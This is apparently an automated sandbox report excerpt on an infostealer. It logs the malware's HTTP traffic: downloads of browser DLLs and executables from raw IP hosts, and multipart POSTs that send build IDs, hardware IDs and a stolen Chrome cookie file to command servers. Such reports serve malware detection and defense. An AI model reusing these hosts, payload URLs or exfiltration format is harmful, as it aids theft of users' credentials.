Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 32 33 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 2d 2d 0d 0a Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="mode"51------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="task_id"1023589------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="status"1------KKKEBKJJDGHCBGCAAKEH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 2d 2d 0d 0a Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="mode"6------HJDGHIJDGCBAAAAAFIJD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: stadiatechnologies.comContent-Length: 3225Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258-a33c7340-61ca------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HCBFIJJECFIEBGDGCFIJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKEHJEGCFCAKFIIJJJHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="mode"1------GHJKEHJEGCFCAKFIIJJJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="mode"2------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFIDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="mode"21------EHDBGDHDAECBGDHJKFID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 147.45.68.138Content-Length: 8081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="file_name"Q29va2ll

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 95.164.119.162 95.164.119.162

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49710 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49734 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=kxNpgzCHIQX.RGCAsbyPpea8VQ8zTqPRZLmy2FiWcC4-1724878516-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_XOQbUhQrJ6L1xvGO.BLgMQMbLZJ8u_sHe.5Wkz2_pk-1724878566-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

3_2_00405000

Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=c502aee2533efa76c5_13289933752292435604
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: stadiatechnologies.com

Source: unknown

Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeF
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeT
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeX
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exem-data;
